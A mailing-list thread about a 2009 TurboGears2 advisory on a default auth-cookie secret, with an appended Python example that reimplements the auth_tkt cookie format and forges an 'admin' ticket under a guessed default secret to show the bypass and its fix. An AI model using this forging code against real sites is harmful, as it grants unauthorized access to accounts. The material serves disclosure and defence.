Hi all,

The easy_install ... TurboGears2 update did not work for me either; I needed to specify the tar.gz manually as well. With regard to adding the cookie_secret, I was only able to do it in app_cfg.py, as I could not make it work using the .ini file.
Regards,
Dax

On Aug 16, 7:47 am, [email protected] wrote:
> Hi Mark, that's an important improvement.
>
> On Wed, Aug 12, 2009 at 04:16, Mark Ramm <[email protected]> wrote:
> > We recently discovered that TurboGears2 ships with quickstart configuration
> > that leaves users of its default user authorization/authentication scheme
> > vulnerable to a serious security issue.
> >
> > If you are running a TG2 application in production you are strongly
> > encouraged to set the cookie salt for the authorization cookie in repoze.who
> > to something other than its default value.
> >
> > This is simple enough to do, just set base_config.sa_auth.cookie_secret to
> > any secret value you'd like. For example:
> >
> >     base_config.sa_auth.cookie_secret = "mynewsecret"
> >
> > You can also set it in development.ini using a key like:
> >
> >     sa_auth.cookie_secret = "mysupersecret"
>
> It's a matter of my misunderstanding of the ini formats, but I failed to set
> this in my roughly default development.ini.
>
> Any idea is welcome.
>
> > Failure to do this could leave you vulnerable to someone who knows the
> > default cookie secret being able to craft a cookie that allows a user into
> > your site without authenticating through the normal mechanism.
> >
> > TurboGears 2.0.2 will enforce setting the cookie secret and will refuse to
> > run if you have not set that value in your configuration.
> >
> > We've just released 2.0.2, which also fixes another security issue which
> > could cause controller methods decorated with something other tha...@expose
> > to still be exposed through the url dispatch mechanism.
> >
> > You can update to 2.0.2 with
> >
> >     easy_install -Ui http://turbogears.org/2.0/downloads/current/turbogears2
>
> Well, this wouldn't work for me either, and I had to specify the tar.gz name
> manually.
> >
> > --
> > Mark Ramm-Christensen
> > email: mark at compoundthinking dot com
> > blog: www.compoundthinking.com/blog
>
> --
> alex
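To make the risk in Mark's announcement concrete, here is an added example (not TurboGears or repoze.who code) that reimplements the mod_auth_tkt ticket format that repoze.who's auth_tkt plugin uses for the cookie the cookie_secret protects: the ticket is a double-MD5 digest over the client IP, a timestamp, the secret, the user id, tokens and user data, followed by those fields in the clear. Whoever knows the secret can mint a ticket for any user id, so a secret that ships with every quickstart is no secret at all. The example forges a ticket for "admin" under a placeholder default secret (the string "secret" is an assumption here, not the value TG2 shipped), shows that a verifier using that same secret accepts it, and that a verifier using a freshly generated per-deployment secret rejects it. It does not matter for the cookie itself whether the secret ends up in app_cfg.py or development.ini; what matters is that the running application has a value nobody else knows.

```python
"""Toy reimplementation of the mod_auth_tkt / repoze.who auth_tkt cookie.

Added illustration, not TG2 or repoze.who code. Layout of a ticket:
    <32 hex md5 digest><8 hex timestamp><userid>!<tokens>!<user_data>
where digest = md5(md5(ip+ts || secret || userid \\0 tokens \\0 user_data) || secret).
"""
import hashlib
import hmac
import secrets
import struct
import time


def _encode_ip_timestamp(ip: str, ts: int) -> bytes:
    # mod_auth_tkt packs the four IPv4 octets followed by the 32-bit timestamp, big-endian.
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError("expected a dotted-quad IPv4 address")
    return struct.pack(">4BI", *octets, ts & 0xFFFFFFFF)


def calculate_digest(ip: str, ts: int, secret: str, userid: str,
                     tokens: str = "", user_data: str = "") -> str:
    inner = hashlib.md5(
        _encode_ip_timestamp(ip, ts)
        + secret.encode() + userid.encode() + b"\0"
        + tokens.encode() + b"\0" + user_data.encode()
    ).hexdigest()
    return hashlib.md5(inner.encode() + secret.encode()).hexdigest()


def make_ticket(secret: str, userid: str, ip: str = "0.0.0.0", tokens: str = "",
                user_data: str = "", ts=None) -> str:
    """Mint a ticket. With include_ip off, auth_tkt uses 0.0.0.0 as the IP."""
    ts = int(time.time()) if ts is None else int(ts)
    digest = calculate_digest(ip, ts, secret, userid, tokens, user_data)
    value = "%s%08x%s!" % (digest, ts, userid)
    if tokens:
        value += tokens + "!"
    return value + user_data


def parse_ticket(ticket: str, secret: str, ip: str = "0.0.0.0"):
    """Return (timestamp, userid, tokens, user_data), or None if the digest is wrong."""
    if len(ticket) < 41:
        return None
    digest, ts_hex, rest = ticket[:32], ticket[32:40], ticket[40:]
    try:
        ts = int(ts_hex, 16)
        userid, data = rest.split("!", 1)
    except ValueError:
        return None
    if "!" in data:
        tokens, user_data = data.split("!", 1)
    else:
        tokens, user_data = "", data
    expected = calculate_digest(ip, ts, secret, userid, tokens, user_data)
    # Constant-time comparison so the verifier does not leak the digest byte by byte.
    if not hmac.compare_digest(expected, digest):
        return None
    return ts, userid, tokens, user_data


def forgery_demo():
    """Forge an admin ticket with a guessed default secret; check both verifiers."""
    DEFAULT_SECRET = "secret"            # placeholder for a shipped default (assumed value)
    per_deployment = secrets.token_hex(32)  # what an operator should configure instead
    forged = make_ticket(DEFAULT_SECRET, "admin", tokens="managers", ts=1250000000)
    accepted_by_default = parse_ticket(forged, DEFAULT_SECRET) is not None
    accepted_by_rotated = parse_ticket(forged, per_deployment) is not None
    return accepted_by_default, accepted_by_rotated


if __name__ == "__main__":
    print(forgery_demo())  # (True, False)
```

The first element of the result is the attack: a server still running with the shared default secret accepts a cookie the attacker built offline, with no login at all. The second element is the fix Mark describes: once the secret is unique to the deployment, the same cookie fails the digest check. The secret never travels in the cookie, so rotating it also logs every existing session out, which is the desired effect after a disclosure like this one.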

